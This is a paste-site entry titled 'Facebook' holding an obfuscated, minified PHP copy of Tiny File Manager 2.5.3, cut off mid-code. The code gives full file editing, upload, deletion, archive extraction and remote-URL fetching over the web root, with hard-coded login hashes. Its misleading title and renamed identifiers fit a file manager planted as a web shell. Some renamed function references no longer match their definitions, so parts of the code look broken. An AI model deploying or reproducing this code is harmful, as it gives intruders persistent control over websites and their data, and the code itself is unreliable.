Facebook
From Chartreuse Parrot, 1 Year ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 536
  1. <?php $q58='{"lang":"en","error_reporting":false,"show_hidden":false,"hide_Cols":false,"theme":"light"}';/**
  2.  * H3K | Tiny File Manager V2.5.3
  3.  * @author CCP Programmers
  4.  * @github https://github.com/prasathmani/tinyfilemanager
  5.  * @link https://tinyfilemanager.github.io
  6.  */ define('VERSION','2.5.3');define('APP_TITLE','Tiny File Manager');$n59=true;$l60=array('admin'=>'$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW','user'=>'$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' );$f61=array('user');$z62=false;$l63=array();$h64=true;$p65='vs';$s66=true;$i67='Etc/UTC';$n68=$_SERVER['DOCUMENT_ROOT'];$w69='';$f70=$_SERVER['HTTP_HOST'];$y71='UTF-8';$h72='m/d/Y g:i A';$i73='';$f74='';$v75='';$h76=array();$l77='google';$x78=true;$e79=5000000000;$j80=2000000;$p81='OFF';$b82=true;$t83=array('127.0.0.1','::1' );$w84=array('0.0.0.0','::' );$i85=array('css-bootstrap'=>'<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-Zenh87qX5JnK2Jl0vWa8Ck2rdkQ2Bzep5IDxbcnCeuOxjzrPF/et3URy9Bv1WTRi" crossorigin="anonymous">','css-dropzone'=>'<link href="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.css" rel="stylesheet">','css-font-awesome'=>'<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" crossorigin="anonymous">','css-highlightjs'=>'<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/styles/'.$p65.'.min.css">','js-ace'=>'<script src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.13.1/ace.js"></script>','js-bootstrap'=>'<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-OERcA2EqjJCMA+/3y+gxIOqMEjwtxJY7qPCqsdltbNJuaOe923+mo//f6V8Qbsw3" crossorigin="anonymous"></script>','js-dropzone'=>'<script src="https://cdnjs.cloudflare.com/ajax/libs/dropzone/5.9.3/min/dropzone.min.js"></script>','js-jquery'=>'<script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>','js-jquery-datatables'=>'<script src="https://cdn.datatables.net/1.13.1/js/jquery.dataTables.min.js" crossorigin="anonymous" defer></script>','js-highlightjs'=>'<script src="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/11.6.0/highlight.min.js"></script>','pre-jsdelivr'=>'<link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin/><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"/>','pre-cloudflare'=>'<link rel="preconnect" href="https://cdnjs.cloudflare.com" crossorigin/><link rel="dns-prefetch" href="https://cdnjs.cloudflare.com"/>');$n86=__DIR__.'/config.php';if(is_readable($n86)){@include($n86);}define('MAX_UPLOAD_SIZE',$e79);define('UPLOAD_CHUNK_SIZE',$j80);if(!defined('FM_SESSION_ID')){define('FM_SESSION_ID','filemanager');}$j87=new k88();$x89=isset($j87->$a90['lang'])?$j87->$a90['lang']:'en';$m91=isset($j87->$a90['show_hidden'])?$j87->$a90['show_hidden']:true;$s92=isset($j87->$a90['error_reporting'])?$j87->$a90['error_reporting']:true;$a93=isset($j87->$a90['hide_Cols'])?$j87->$a90['hide_Cols']:true;$a94=isset($j87->$a90['theme'])?$j87->$a90['theme']:'light';define('FM_THEME',$a94);$e95=array('en'=>'English');if($s92==true){@ini_set('error_reporting',E_ALL);@ini_set('display_errors',1);}else{@ini_set('error_reporting',E_ALL);@ini_set('display_errors',0);}if(defined('FM_EMBED')){$n59=false;$x78=false;}else{@set_time_limit(600);date_default_timezone_set($i67);ini_set('default_charset','UTF-8');if(version_compare(PHP_VERSION,'5.6.0','<')&&function_exists('mb_internal_encoding')){mb_internal_encoding('UTF-8');}if(function_exists('mb_regex_encoding')){mb_regex_encoding('UTF-8');}session_cache_limiter('');session_name(FM_SESSION_ID);function h0($e96,$b97,$b98,$v99){if($e96==2){session_abort();session_id(session_create_id());@session_start();}}set_error_handler('session_error_handling_function');session_start();restore_error_handler();}if(empty($_SESSION['token'])){$_SESSION['token']=bin2hex(random_bytes(32));}if(empty($l60)){$n59=false;}$h100=isset($_SERVER['HTTPS'])&&($_SERVER['HTTPS']=='on'||$_SERVER['HTTPS']==1)||isset($_SERVER['HTTP_X_FORWARDED_PROTO'])&&$_SERVER['HTTP_X_FORWARDED_PROTO']=='https';if(isset($_SESSION[FM_SESSION_ID]['logged'])&&!empty($l63[$_SESSION[FM_SESSION_ID]['logged']])){$o101=s19(dirname($_SERVER['PHP_SELF']));$w69=$w69.$o101.DIRECTORY_SEPARATOR.$l63[$_SESSION[FM_SESSION_ID]['logged']];}$w69=s19($w69);defined('FM_ROOT_URL')||define('FM_ROOT_URL',($h100?'https':'http').'://'.$f70.(!empty($w69)?'/'.$w69:''));defined('FM_SELF_URL')||define('FM_SELF_URL',($h100?'https':'http').'://'.$f70.$_SERVER['PHP_SELF']);if(isset($_GET['logout'])){unset($_SESSION[FM_SESSION_ID]['logged']);unset($_SESSION['token']);b17(FM_SELF_URL);}if($p81!='OFF'){function m1(){if(array_key_exists('HTTP_CF_CONNECTING_IP',$_SERVER)){return $_SERVER["HTTP_CF_CONNECTING_IP"];}else if(array_key_exists('HTTP_X_FORWARDED_FOR',$_SERVER)){return $_SERVER["HTTP_X_FORWARDED_FOR"];}else if(array_key_exists('REMOTE_ADDR',$_SERVER)){return $_SERVER['REMOTE_ADDR'];}else if(array_key_exists('HTTP_CLIENT_IP',$_SERVER)){return $_SERVER['HTTP_CLIENT_IP'];}return '';}$q102=m1();$x103=false;$w104=in_array($q102,$t83);$z105=in_array($q102,$w84);if($p81=='AND'){if($w104==true&&$z105==false){$x103=true;}}else if($p81=='OR'){if($w104==true||$z105==false){$x103=true;}}if($x103==false){trigger_error('User connection denied from: '.$q102,E_USER_WARNING);if($b82==false){i29(z57('Access denied. IP restriction applicable'),'error');k53();k52();}exit();}}if($n59){if(isset($_SESSION[FM_SESSION_ID]['logged'],$l60[$_SESSION[FM_SESSION_ID]['logged']])){}elseif(isset($_POST['fm_usr'],$_POST['fm_pwd'],$_POST['token'])){sleep(1);if(function_exists('password_verify')){if(isset($l60[$_POST['fm_usr']])&&isset($_POST['fm_pwd'])&&password_verify($_POST['fm_pwd'],$l60[$_POST['fm_usr']])&&k8($_POST['token'])){$_SESSION[FM_SESSION_ID]['logged']=$_POST['fm_usr'];i29(z57('You are logged in'));b17(FM_ROOT_URL);}else{unset($_SESSION[FM_SESSION_ID]['logged']);i29(z57('Login failed. Invalid username or password'),'error');b17(FM_ROOT_URL);}}else{i29(z57('password_hash not supported, Upgrade PHP version'),'error');;}}else{unset($_SESSION[FM_SESSION_ID]['logged']);k53();?>
  7.         <section class="h-100">
  8.             <div class="container h-100">
  9.                 <div class="row justify-content-md-center h-100">
  10.                     <div class="card-wrapper">
  11.                         <div class="card fat <?php echo x44();?>">
  12.                             <div class="card-body">
  13.                                 <form class="form-signin" action="" method="post" autocomplete="off">
  14.                                     <div class="mb-3">
  15.                                        <div class="brand">
  16.                                             <svg version="1.0" xmlns="http://www.w3.org/2000/svg" M1008 width="100%" height="80px" viewBox="0 0 238.000000 140.000000" aria-label="H3K Tiny File Manager">
  17.                                                 <g transform="translate(0.000000,140.000000) scale(0.100000,-0.100000)" fill="#000000" stroke="none">
  18.                                                     <path d="M160 700 l0 -600 110 0 110 0 0 260 0 260 70 0 70 0 0 -260 0 -260 110 0 110 0 0 600 0 600 -110 0 -110 0 0 -260 0 -260 -70 0 -70 0 0 260 0 260 -110 0 -110 0 0 -600z"/>
  19.                                                     <path fill="#003500" d="M1008 1227 l-108 -72 0 -117 0 -118 110 0 110 0 0 110 0 110 70 0 70 0 0 -180 0 -180 -125 0 c-69 0 -125 -3 -125 -6 0 -3 23 -39 52 -80 l52 -74 73 0 73 0 0 -185 0 -185 -70 0 -70 0 0 115 0 115 -110 0 -110 0 0 -190 0 -190 181 0 181 0 109 73 108 72 1 181 0 181 -69 48 -68 49 68 50 69 49 0 249 0 248 -182 -1 -183 0 -107 -72z"/>
  20.                                                     <path d="M1640 700 l0 -600 110 0 110 0 0 208 0 208 35 34 35 34 35 -34 35 -34 0 -208 0 -208 110 0 110 0 0 212 0 213 -87 87 -88 88 88 88 87 87 0 213 0 212 -110 0 -110 0 0 -208 0 -208 -70 -69 -70 -69 0 277 0 277 -110 0 -110 0 0 -600z"/></g>
  21.                                             </svg>
  22.                                         </div>
  23.                                         <div class="text-center">
  24.                                             <h1 class="card-title"><?php echo APP_TITLE;?></h1>
  25.                                         </div>
  26.                                     </div>
  27.                                     <hr />
  28.                                     <div class="mb-3">
  29.                                         <label for="fm_usr" class="pb-2"><?php echo z57('Username');?></label>
  30.                                         <input type="text" class="form-control" id="fm_usr" name="fm_usr" required autofocus>
  31.                                     </div>
  32.  
  33.                                     <div class="mb-3">
  34.                                         <label for="fm_pwd" class="pb-2"><?php echo z57('Password');?></label>
  35.                                         <input type="password" class="form-control" id="fm_pwd" name="fm_pwd" required>
  36.                                     </div>
  37.  
  38.                                     <div class="mb-3">
  39.                                         <?php k52();?>
  40.                                     </div>
  41.                                     <input type="hidden" name="token" value="<?php echo htmlentities($_SESSION['token']);?>" />
  42.                                     <div class="mb-3">
  43.                                         <button type="submit" class="btn btn-success btn-block w-100 mt-4" role="button">
  44.                                             <?php echo z57('Login');?>
  45.                                         </button>
  46.                                     </div>
  47.                                 </form>
  48.                             </div>
  49.                         </div>
  50.                         <div class="footer text-center">
  51.                             &mdash;&mdash; &copy;
  52.                             <a href="https://tinyfilemanager.github.io/" target="_blank" class="text-decoration-none text-muted" data-version="<?php echo VERSION;?>">CCP Programmers</a> &mdash;&mdash;
  53.                         </div>
  54.                     </div>
  55.                 </div>
  56.             </div>
  57.         </section>
  58.  
  59.         <?php c54();exit;}}if($n59&&isset($_SESSION[FM_SESSION_ID]['logged'])){$n68=isset($l63[$_SESSION[FM_SESSION_ID]['logged']])?$l63[$_SESSION[FM_SESSION_ID]['logged']]:$n68;}$n68=rtrim($n68,'\\/');$n68=str_replace('\\','/',$n68);if(!@is_dir($n68)){echo "<h1>".z57('Root path')." \"{$n68}\" ".z57('not found!')." </h1>";exit;}defined('FM_SHOW_HIDDEN')||define('FM_SHOW_HIDDEN',$m91);defined('FM_ROOT_PATH')||define('FM_ROOT_PATH',$n68);defined('FM_LANG')||define('FM_LANG',$x89);defined('FM_FILE_EXTENSION')||define('FM_FILE_EXTENSION',$i73);defined('FM_UPLOAD_EXTENSION')||define('FM_UPLOAD_EXTENSION',$f74);defined('FM_EXCLUDE_ITEMS')||define('FM_EXCLUDE_ITEMS',(version_compare(PHP_VERSION,'7.0.0','<')?serialize($h76):$h76));defined('FM_DOC_VIEWER')||define('FM_DOC_VIEWER',$l77);define('FM_READONLY',$z62||($n59&&!empty($f61)&&isset($_SESSION[FM_SESSION_ID]['logged'])&&in_array($_SESSION[FM_SESSION_ID]['logged'],$f61)));define('FM_IS_WIN',DIRECTORY_SEPARATOR=='\\');if(!isset($_GET['p'])&&empty($_FILES)){b17(FM_SELF_URL.'?p=');}$k106=isset($_GET['p'])?$_GET['p']:(isset($_POST['p'])?$_POST['p']:'');$k106=s19($k106);$m107=file_get_contents('php://input');$_POST=(strpos($m107,'ajax')!=FALSE&&strpos($m107,'save')!=FALSE)?json_decode($m107,true):$_POST;define('FM_PATH',$k106);define('FM_USE_AUTH',$n59);define('FM_EDIT_FILE',$s66);defined('FM_ICONV_INPUT_ENC')||define('FM_ICONV_INPUT_ENC',$y71);defined('FM_USE_HIGHLIGHTJS')||define('FM_USE_HIGHLIGHTJS',$h64);defined('FM_HIGHLIGHTJS_STYLE')||define('FM_HIGHLIGHTJS_STYLE',$p65);defined('FM_DATETIME_FORMAT')||define('FM_DATETIME_FORMAT',$h72);unset($k106,$n59,$y71,$h64,$p65);if((isset($_SESSION[FM_SESSION_ID]['logged'],$l60[$_SESSION[FM_SESSION_ID]['logged']])||!FM_USE_AUTH)&&isset($_POST['ajax'],$_POST['token'])&&!FM_READONLY){if(!k8($_POST['token'])){header('HTTP/1.0 401 Unauthorized');die("Invalid Token.");}if(isset($_POST['type'])&&$_POST['type']=="search"){$s108=$_POST['path']=="."?'':$_POST['path'];$t109=e42(s19($s108),$_POST['content']);echo json_encode($t109);exit();}if(isset($_POST['type'])&&$_POST['type']=="save"){$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if(!is_dir($h110)){b17(FM_SELF_URL.'?p=');}$b98=$_GET['edit'];$b98=s19($b98);$b98=str_replace('/','',$b98);if($b98==''||!is_file($h110.'/'.$b98)){i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}header('X-XSS-Protection:0');$c112=$h110.'/'.$b98;$v113=$_POST['content'];$i114=fopen($c112,"w");$e115=@fwrite($i114,$v113);fclose($i114);if($e115===false){header("HTTP/1.1 500 Internal Server Error");die("Could Not Write File! - Check Permissions / Ownership");}die(true);}if(isset($_POST['type'])&&$_POST['type']=="backup"&&!empty($_POST['file'])){$o116=s19($_POST['file']);$s117=FM_ROOT_PATH.'/';if(!empty($_POST['path'])){$s118=s19($_POST['path']);$s117.="{$s118}/";}$e119=date("dMy-His");$b120="{$o116}-{$e119}.bak";$g121=$s117.$o116;try{if(!file_exists($g121)){throw new w122("File {$o116} not found");}if(copy($g121,$s117.$b120)){echo"Backup {$b120} created";}else{throw new w122("Could not copy file {$o116}");}}catch(Exception $d123){echo $d123->v124();}}if(isset($_POST['type'])&&$_POST['type']=="settings"){global $j87,$x89,$s92,$m91,$e95,$a93,$a94;$l125=$_POST['js-language'];b22([]);if(!array_key_exists($l125,$e95)){$l125='en';}$n126=isset($_POST['js-error-report'])&&$_POST['js-error-report']=="true"?true:false;$k127=isset($_POST['js-show-hidden'])&&$_POST['js-show-hidden']=="true"?true:false;$s128=isset($_POST['js-hide-cols'])&&$_POST['js-hide-cols']=="true"?true:false;$w129=$_POST['js-theme-3'];if($j87->$a90['lang']!=$l125){$j87->$a90['lang']=$l125;$x89=$l125;}if($j87->$a90['error_reporting']!=$n126){$j87->$a90['error_reporting']=$n126;$s92=$n126;}if($j87->$a90['show_hidden']!=$k127){$j87->$a90['show_hidden']=$k127;$m91=$k127;}if($j87->$a90['show_hidden']!=$k127){$j87->$a90['show_hidden']=$k127;$m91=$k127;}if($j87->$a90['hide_Cols']!=$s128){$j87->$a90['hide_Cols']=$s128;$a93=$s128;}if($j87->$a90['theme']!=$w129){$j87->$a90['theme']=$w129;$a94=$w129;}$j87->g50();echo true;}if(isset($_POST['type'])&&$_POST['type']=="pwdhash"){$a130=isset($_POST['inputPassword2'])&&!empty($_POST['inputPassword2'])?password_hash($_POST['inputPassword2'],PASSWORD_DEFAULT):'';echo $a130;}if(isset($_POST['type'])&&$_POST['type']=="upload"&&!empty($_REQUEST["uploadurl"])){$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}function x2($x131){global $j132;echo json_encode($x131);}function s3(){global $h110,$x133,$l134;return $h110."/".basename($x133->$x135);}$e136=!empty($_REQUEST["uploadurl"])&&preg_match("|^http(s)?://.+$|",stripslashes($_REQUEST["uploadurl"]))?stripslashes($_REQUEST["uploadurl"]):null;$k137=parse_url($e136,PHP_URL_HOST);$k138=parse_url($e136,PHP_URL_PORT);$c139=[22,23,25,3306];if(preg_match("/^localhost$|^127(?:\.[0-9]+){0,2}\.[0-9]+$|^(?:0*\:)*?:?0*1$/i",$k137)||in_array($k138,$c139)){$h140=array("message"=>"URL is not allowed");x2(array("fail"=>$h140));exit();}$e141=false;$l134=tempnam(sys_get_temp_dir(),"upload-");$x133=new b142();$x133->$x135=trim(basename($e136),".\x00..\x20");$i143=(FM_UPLOAD_EXTENSION)?explode(',',FM_UPLOAD_EXTENSION):false;$w144=strtolower(pathinfo($x133->$x135,PATHINFO_EXTENSION));$l145=($i143)?in_array($w144,$i143):true;$h140=false;if(!$l145){$h140=array("message"=>"File extension is not allowed");x2(array("fail"=>$h140));exit();}if(!$e136){$z146=false;}else if($e141){@$e147=fopen($l134,"w");@$p148=curl_init($e136);curl_setopt($p148,CURLOPT_NOPROGRESS,false);curl_setopt($p148,CURLOPT_FOLLOWLOCATION,true);curl_setopt($p148,CURLOPT_FILE,$e147);@$z146=curl_exec($p148);$f149=curl_getinfo($p148);if(!$z146){$h140=array("message"=>curl_error($p148));}@curl_close($p148);fclose($e147);$x133->$j150=$f149["size_download"];$x133->$e151=$f149["content_type"];}else{$a152=stream_context_create();@$z146=copy($e136,$l134,$a152);if(!$z146){$h140=error_get_last();}}if($z146){$z146=rename($l134,strtok(s3(),'?'));}if($z146){x2(array("done"=>$x133));}else{unlink($l134);if(!$h140){$h140=array("message"=>"Invalid url parameter");}x2(array("fail"=>$h140));}}exit();}if(isset($_GET['del'],$_POST['token'])&&!FM_READONLY){$f153=str_replace('/','',s19($_GET['del']));if($f153!=''&&$f153!='..'&&$f153!='.'&&k8($_POST['token'])){$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}$u154=is_dir($h110.'/'.$f153);if(n9($h110.'/'.$f153)){$b97=$u154?z57('Folder').' <b>%s</b> '.z57('Deleted'):z57('File').' <b>%s</b> '.z57('Deleted');i29(sprintf($b97,w27($f153)));}else{$b97=$u154?z57('Folder').' <b>%s</b> '.z57('not deleted'):z57('File').' <b>%s</b> '.z57('not deleted');i29(sprintf($b97,w27($f153)),'error');}}else{i29(z57('Invalid file or folder name'),'error');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['newfilename'],$_POST['newfile'],$_POST['token'])&&!FM_READONLY){$e155=urldecode($_POST['newfile']);$s156=str_replace('/','',s19(strip_tags($_POST['newfilename'])));if(m28($s156)&&$s156!=''&&$s156!='..'&&$s156!='.'&&k8($_POST['token'])){$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if($e155=="file"){if(!file_exists($h110.'/'.$s156)){if(z11($s156)){@fopen($h110.'/'.$s156,'w')or die('Cannot open file:  '.$s156);i29(sprintf(z57('File').' <b>%s</b> '.z57('Created'),w27($s156)));}else{i29(z57('File extension is not allowed'),'error');}}else{i29(sprintf(z57('File').' <b>%s</b> '.z57('already exists'),w27($s156)),'alert');}}else{if(n14($h110.'/'.$s156,false)===true){i29(sprintf(z57('Folder').' <b>%s</b> '.z57('Created'),$s156));}elseif(n14($h110.'/'.$s156,false)===$h110.'/'.$s156){i29(sprintf(z57('Folder').' <b>%s</b> '.z57('already exists'),w27($s156)),'alert');}else{i29(sprintf(z57('Folder').' <b>%s</b> '.z57('not created'),w27($s156)),'error');}}}else{i29(z57('Invalid characters in file or folder name'),'error');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_GET['copy'],$_GET['finish'])&&!FM_READONLY){$i157=urldecode($_GET['copy']);$i157=s19($i157);if($i157==''){i29(z57('Source path not defined'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}$p158=FM_ROOT_PATH.'/'.$i157;$i159=FM_ROOT_PATH;if(FM_PATH!=''){$i159.='/'.FM_PATH;}$i159.='/'.basename($p158);$t160=isset($_GET['move']);$t160=s19(urldecode($t160));if($p158!=$i159){$y161=trim(FM_PATH.'/'.basename($p158),'/');if($t160){$d162=c12($p158,$i159);if($d162){i29(sprintf(z57('Moved from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($i157),w27($y161)));}elseif($d162===null){i29(z57('File or folder with this path already exists'),'alert');}else{i29(sprintf(z57('Error while moving from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($i157),w27($y161)),'error');}}else{if(p13($p158,$i159)){i29(sprintf(z57('Copied from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($i157),w27($y161)));}else{i29(sprintf(z57('Error while copying from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($i157),w27($y161)),'error');}}}else{if(!$t160){$y161=trim(FM_PATH.'/'.basename($p158),'/');$f163=pathinfo($p158);$c164='';if(!is_dir($p158)){$c164='.'.$f163['extension'];}$d165=$f163['dirname'].'/'.$f163['filename'].'-'.date('YmdHis').$c164;$w166=0;$l167=1000;while(file_exists($d165)&$w166<$l167){$f163=pathinfo($d165);$d165=$f163['dirname'].'/'.$f163['filename'].'-copy'.$c164;$w166++;}if(p13($p158,$d165,False)){i29(sprintf('Copyied from <b>%s</b> to <b>%s</b>',w27($i157),w27($d165)));}else{i29(sprintf('Error while copying from <b>%s</b> to <b>%s</b>',w27($i157),w27($d165)),'error');}}else{i29(z57('Paths must be not equal'),'alert');}}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['file'],$_POST['copy_to'],$_POST['finish'],$_POST['token'])&&!FM_READONLY){if(!k8($_POST['token'])){i29(z57('Invalid Token.'),'error');}$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}$q168=FM_ROOT_PATH;$g169=s19($_POST['copy_to']);if($g169!=''){$q168.='/'.$g169;}if($h110==$q168){i29(z57('Paths must be not equal'),'alert');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(!is_dir($q168)){if(!n14($q168,true)){i29('Unable to create destination folder','error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}}$t160=isset($_POST['move']);$c170=0;$t171=$_POST['file'];if(is_array($t171)&&count($t171)){foreach($t171 as $l172){if($l172!=''){$l172=s19($l172);$p158=$h110.'/'.$l172;$i159=$q168.'/'.$l172;if($t160){$d162=c12($p158,$i159);if($d162===false){$c170++;}}else{if(!p13($p158,$i159)){$c170++;}}}}if($c170==0){$b97=$t160?'Selected files and folders moved':'Selected files and folders copied';i29($b97);}else{$b97=$t160?'Error while moving items':'Error while copying items';i29($b97,'error');}}else{i29(z57('Nothing selected'),'alert');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['rename_from'],$_POST['rename_to'],$_POST['token'])&&!FM_READONLY){if(!k8($_POST['token'])){i29("Invalid Token.",'error');}$o173=urldecode($_POST['rename_from']);$o173=s19($o173);$o173=str_replace('/','',$o173);$s156=urldecode($_POST['rename_to']);$s156=s19(strip_tags($s156));$s156=str_replace('/','',$s156);$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if(m28($s156)&&$o173!=''&&$s156!=''){if(c12($h110.'/'.$o173,$h110.'/'.$s156)){i29(sprintf(z57('Renamed from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($o173),w27($s156)));}else{i29(sprintf(z57('Error while renaming from').' <b>%s</b> '.z57('to').' <b>%s</b>',w27($o173),w27($s156)),'error');}}else{i29(z57('Invalid characters in file name'),'error');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_GET['dl'],$_POST['token'])){if(!k8($_POST['token'])){i29("Invalid Token.",'error');}$l174=urldecode($_GET['dl']);$l174=s19($l174);$l174=str_replace('/','',$l174);$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if($l174!=''&&is_file($h110.'/'.$l174)){v43($h110.'/'.$l174,$l174,1024);exit;}else{i29(z57('File not found'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}}if(!empty($_FILES)&&!FM_READONLY){if(isset($_POST['token'])){if(!k8($_POST['token'])){$t109=array('status'=>'error','info'=>"Invalid Token.");echo json_encode($t109);exit();}}else{$t109=array('status'=>'error','info'=>"Token Missing.");echo json_encode($t109);exit();}$f175=false;$g176=$_POST['dzchunkindex'];$l177=$_POST['dztotalchunkcount'];$l178=s19($_REQUEST['fullpath']);$l172=$_FILES;$h110=FM_ROOT_PATH;$p179=DIRECTORY_SEPARATOR;if(FM_PATH!=''){$h110.='/'.FM_PATH;}$c170=0;$l180=0;$i143=(FM_UPLOAD_EXTENSION)?explode(',',FM_UPLOAD_EXTENSION):false;$t109=array('status'=>'error','info'=>'Oops! Try again');$p181=$l172['file']['name'];$b182=$l172['file']['tmp_name'];$w144=pathinfo($p181,PATHINFO_FILENAME)!=''?strtolower(pathinfo($p181,PATHINFO_EXTENSION)):'';$l145=($i143)?in_array($w144,$i143):true;if(!m28($p181)&&!m28($l178)){$t109=array('status'=>'error','info'=>"Invalid File name!",);echo json_encode($t109);exit();}$j183=$h110.$p179;if(is_writable($j183)){$s117=$h110.'/'.basename($l178);$f184=substr($s117,0,strrpos($s117,"/"));if(file_exists($s117)&&!$f175&&!$w185){$v186=$w144?'.'.$w144:'';$s117=$h110.'/'.basename($l178,$v186).'_'.date('ymdHis').$v186;}if(!is_dir($f184)){$o173=umask(0);mkdir($f184,0777,true);umask($o173);}if(empty($l172['file']['error'])&&!empty($b182)&&$b182!='none'&&$l145){if($l177){$a187=@fopen("{$s117}.part",$g176==0?"wb":"ab");if($a187){$x188=@fopen($b182,"rb");if($x188){while($w189=fread($x188,4096)){fwrite($a187,$w189);}$t109=array('status'=>'success','info'=>"file upload successful");}else{$t109=array('status'=>'error','info'=>"failed to open output stream",'errorDetails'=>error_get_last());}@fclose($x188);@fclose($a187);@unlink($b182);$t109=array('status'=>'success','info'=>"file upload successful");}else{$t109=array('status'=>'error','info'=>"failed to open output stream");}if($g176==$l177-1){rename("{$s117}.part",$s117);}}else if(move_uploaded_file($b182,$s117)){if(file_exists($s117)){$t109=array('status'=>'success','info'=>"file upload successful");}else{$t109=array('status'=>'error','info'=>'Couldn\'t upload the requested file.');}}else{$t109=array('status'=>'error','info'=>"Error while uploading files. Uploaded files $l180",);}}}else{$t109=array('status'=>'error','info'=>'The specified folder for upload isn\'t writeable.');}echo json_encode($t109);exit();}if(isset($_POST['group'],$_POST['delete'],$_POST['token'])&&!FM_READONLY){if(!k8($_POST['token'])){i29(z57("Invalid Token."),'error');}$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}$c170=0;$t171=$_POST['file'];if(is_array($t171)&&count($t171)){foreach($t171 as $l172){if($l172!=''){$y190=$h110.'/'.$l172;if(!n9($y190)){$c170++;}}}if($c170==0){i29(z57('Selected files and folder deleted'));}else{i29(z57('Error while deleting items'),'error');}}else{i29(z57('Nothing selected'),'alert');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['group'],$_POST['token'])&&(isset($_POST['zip'])||isset($_POST['tar']))&&!FM_READONLY){if(!k8($_POST['token'])){i29(z57("Invalid Token."),'error');}$h110=FM_ROOT_PATH;$w144='zip';if(FM_PATH!=''){$h110.='/'.FM_PATH;}$w144=isset($_POST['tar'])?'tar':'zip';if(($w144=="zip"&&!class_exists('ZipArchive'))||($w144=="tar"&&!class_exists('PharData'))){i29(z57('Operations with archives are not available'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}$t171=$_POST['file'];$q191=array();foreach($t171 as $b98){array_push($q191,s19($b98));}$t171=$q191;if(!empty($t171)){chdir($h110);if(count($t171)==1){$n192=reset($t171);$n192=basename($n192);$x193=$n192.'_'.date('ymd_His').'.'.$w144;}else{$x193='archive_'.date('ymd_His').'.'.$w144;}if($w144=='zip'){$y194=new g195();$a130=$y194->t46($x193,$t171);}elseif($w144=='tar'){$c196=new j197();$a130=$c196->t46($x193,$t171);}if($a130){i29(sprintf(z57('Archive').' <b>%s</b> '.z57('Created'),w27($x193)));}else{i29(z57('Archive not created'),'error');}}else{i29(z57('Nothing selected'),'alert');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['unzip'],$_POST['token'])&&!FM_READONLY){if(!k8($_POST['token'])){i29(z57("Invalid Token."),'error');}$i198=urldecode($_POST['unzip']);$i198=s19($i198);$i198=str_replace('/','',$i198);$x199=false;$h110=FM_ROOT_PATH;if(FM_PATH!=''){$h110.='/'.FM_PATH;}if($i198!=''&&is_file($h110.'/'.$i198)){$d200=$h110.'/'.$i198;$w144=pathinfo($d200,PATHINFO_EXTENSION);$x199=true;}else{i29(z57('File not found'),'error');}if(($w144=="zip"&&!class_exists('ZipArchive'))||($w144=="tar"&&!class_exists('PharData'))){i29(z57('Operations with archives are not available'),'error');$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if($x199){$c201='';if(isset($_POST['tofolder'])){$c201=pathinfo($d200,PATHINFO_FILENAME);if(n14($h110.'/'.$c201,true)){$h110.='/'.$c201;}}if($w144=="zip"){$y194=new g195();$a130=$y194->p47($d200,$h110);}elseif($w144=="tar"){try{$l202=new y203($d200);if(@$l202->y204($h110,null,true)){$a130=true;}else{$a130=false;}}catch(Exception $d123){$a130=true;}}if($a130){i29(z57('Archive unpacked'));}else{i29(z57('Archive not unpacked'),'error');}}else{i29(z57('File not found'),'error');}$k111=FM_PATH;b17(FM_SELF_URL.'?p='.urlencode($k111));}if(isset($_POST['chmod'],$_POST['token'])&&!FM_READONLY&&!FM_IS_WIN){if(!k8($_POST['token'])){i29(z57("Invalid 